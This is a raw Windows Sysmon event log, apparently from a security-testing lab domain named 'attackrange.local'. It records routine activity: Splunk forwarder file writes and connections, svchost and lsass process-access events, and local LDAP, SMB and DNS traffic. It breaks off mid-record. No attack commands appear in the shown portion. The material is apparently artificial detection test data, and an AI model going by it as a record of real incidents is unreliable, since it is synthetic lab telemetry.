19:18:12.886{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606084Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:12.886{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69D115421D77C49A89A240C24C26B226,SHA256=B3A6A1F4D0ECBE2FD55BDA5698EF29AECA1A3E6F0A83CAAA6DF16F8D73131170falsefalse - insufficient disk space 10341000x80000000000000001095101Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:12.497{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095100Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:12.497{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095099Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:12.319{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3195288A9272B87B04FA7E67265008C0,SHA256=F6D04CC2A3B1D0804C87412B22CB0CE696FC81DC9A9360FF1ED11A0CD244588A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095098Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:12.086{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5905F7B3FD8F41C1E3AAD3CB2FF07DD0,SHA256=3C65B0A6822DF4724EF73CBB6430F77708797138714FB5F2DFF288F4FEAE6F4C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001606083Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:09.630{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49728-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x80000000000000001606082Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:12.047{21761711-83AE-607D-1100-00000000BB01}968C:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat2021-04-19 13:21:46.711 23542300x80000000000000001606081Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:12.046{21761711-83AE-607D-1100-00000000BB01}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=15CF7B118947587CB706FEDAAC5FDFB2,SHA256=9139EA1B69B6608A2CEC637235415A6A2558D25E62A84C341FC2C328C64BB808falsefalse - insufficient disk space 10341000x80000000000000001095104Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:13.498{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095103Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:13.498{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095102Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:13.094{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE4175A013CCBD7787FE96923412A932,SHA256=F1F245FFA38F10CAD4054493E4A921667DA7939B8AF618DCEB7BFE1594C06F08,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001095109Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:09.648{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1146-false10.0.1.12-8000- 10341000x80000000000000001095108Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:14.499{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095107Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:14.499{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095106Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:14.155{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=08BD217A317CB9299CC391EAF4097A89,SHA256=4825FA2B47CF15502040557A8089C8515E01C0DE7D6A10757FD4B4A534BACE53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095105Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:14.102{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D20D8ADB80EA00B5D034835458864A3C,SHA256=76AB9735D98439220E08AE9B7AD88A44E48580ABDB2D15288A6668F57C0E4D03,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606087Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:14.036{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606086Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:14.036{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB0DBBDFF0FF1D3978C143A8204177D0,SHA256=F37F2104C2CBA7A96A12613D4F5D9565DC964C0F88D0C85F13B8CC0E1C0C82D2falsefalse - insufficient disk space 10341000x80000000000000001095112Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:15.500{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095111Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:15.500{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095110Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:15.111{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FC5D6FFBEA8F9CB3E1BE1FB633815BD,SHA256=9051103DBF167BC64F4A10FF372AC037522AF518DF334FC745EAF746FAA21B27,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606091Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:15.060{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xml2021-04-19 13:22:46.774 23542300x80000000000000001606090Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:15.060{21761711-842A-607D-9700-00000000BB01}3716NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=E21F5C2105D3482548EE1DCEAA8E3F18,SHA256=A62C5AB5FD16B72845400EE5338C4D5D0AC27884510730AA80A58BEA4A9B021Efalsefalse - insufficient disk space 11241100x80000000000000001606089Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:15.038{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606088Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:15.038{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35F7E499831F8E8DC7EB3D94886DDE88,SHA256=9B5A3DC3FDD594EBEFDA47ADE8ACD26D8AA31A97CCDEDBDAEDC95CE083DF2E72falsefalse - insufficient disk space 354300x80000000000000001095117Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:11.851{761B69BB-819C-607D-2800-00000000BA01}2912C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-982.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-982.attackrange.local60543- 10341000x80000000000000001095116Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:16.501{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095115Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:16.501{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095114Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:16.364{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B0EFC8BDE677490642446B0433EE5750,SHA256=0EAF4E562BAE0353E8B73058ACCD87C7B39ED6ACD23061F2348A6986C9FF64B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095113Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:16.128{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFD73B3F152AAE23E24B50A4577EB392,SHA256=6C04BB21EB740326C4D65FD60BACA113D21799C9EDD57D12CB9F8A5FBD65DCE8,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606095Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:16.078{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606094Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:16.078{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BA9EAB9CB046427C2FF4652C8CD3885,SHA256=600A19AC329E1FEF0040FDEEA50E37BC1649390B63BD92B02E56EBFC2DB7C04Efalsefalse - insufficient disk space 11241100x80000000000000001606093Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:16.059{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606092Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:16.059{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=03A08DBB8775290273C26059BFF42C47,SHA256=1A5018D494064382AD4291719A90F3D48941AAA4902A013D1C7AF8FF8D076DDAfalsefalse - insufficient disk space 10341000x80000000000000001095121Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:17.535{761B69BB-818A-607D-0B00-00000000BA01}6326300C:\Windows\system32\lsass.exe{761B69BB-8188-607D-0100-00000000BA01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001095120Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:17.502{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095119Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:17.502{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095118Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:17.137{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8121FC46F36E1D6B1BA8720011DD44B0,SHA256=BA1C802515DE4D73529AD32F1041DD58E0C977C1393C507207CA313E3E8B92CB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001606098Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:14.604{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49729-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 11241100x80000000000000001606097Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:17.080{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606096Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:17.080{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABFEDF34CD8EBC56971B339BA983505C,SHA256=DA30FC53B375CF194ACF57139576D3C5B4DFC230157912A0B857A42124F91AE3falsefalse - insufficient disk space 354300x80000000000000001095135Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:14.136{761B69BB-8188-607D-0100-00000000BA01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:118f:34ac:1322:c17ewin-dc-982.attackrange.local1151-truefe80:0:0:0:118f:34ac:1322:c17ewin-dc-982.attackrange.local445microsoft-ds 354300x80000000000000001095134Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:14.136{761B69BB-8188-607D-0100-00000000BA01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:118f:34ac:1322:c17ewin-dc-982.attackrange.local1151-truefe80:0:0:0:118f:34ac:1322:c17ewin-dc-982.attackrange.local445microsoft-ds 354300x80000000000000001095133Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:14.133{761B69BB-818A-607D-0B00-00000000BA01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:118f:34ac:1322:c17ewin-dc-982.attackrange.local1150-truefe80:0:0:0:118f:34ac:1322:c17ewin-dc-982.attackrange.local49669- 354300x80000000000000001095132Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:14.133{761B69BB-818C-607D-1400-00000000BA01}1028C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruetruefe80:0:0:0:118f:34ac:1322:c17ewin-dc-982.attackrange.local1150-truefe80:0:0:0:118f:34ac:1322:c17ewin-dc-982.attackrange.local49669- 354300x80000000000000001095131Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:14.132{761B69BB-818C-607D-0D00-00000000BA01}904C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:118f:34ac:1322:c17ewin-dc-982.attackrange.local1149-truefe80:0:0:0:118f:34ac:1322:c17ewin-dc-982.attackrange.local135epmap 354300x80000000000000001095130Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:14.132{761B69BB-818C-607D-1400-00000000BA01}1028C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruetruefe80:0:0:0:118f:34ac:1322:c17ewin-dc-982.attackrange.local1149-truefe80:0:0:0:118f:34ac:1322:c17ewin-dc-982.attackrange.local135epmap 354300x80000000000000001095129Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:14.035{761B69BB-818A-607D-0B00-00000000BA01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-982.attackrange.local1148-false10.0.1.14win-dc-982.attackrange.local389ldap 354300x80000000000000001095128Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:14.035{761B69BB-818C-607D-1600-00000000BA01}1304C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1148-false10.0.1.14win-dc-982.attackrange.local389ldap 354300x80000000000000001095127Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:14.029{761B69BB-818A-607D-0B00-00000000BA01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:118f:34ac:1322:c17ewin-dc-982.attackrange.local1147-truefe80:0:0:0:118f:34ac:1322:c17ewin-dc-982.attackrange.local389ldap 354300x80000000000000001095126Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 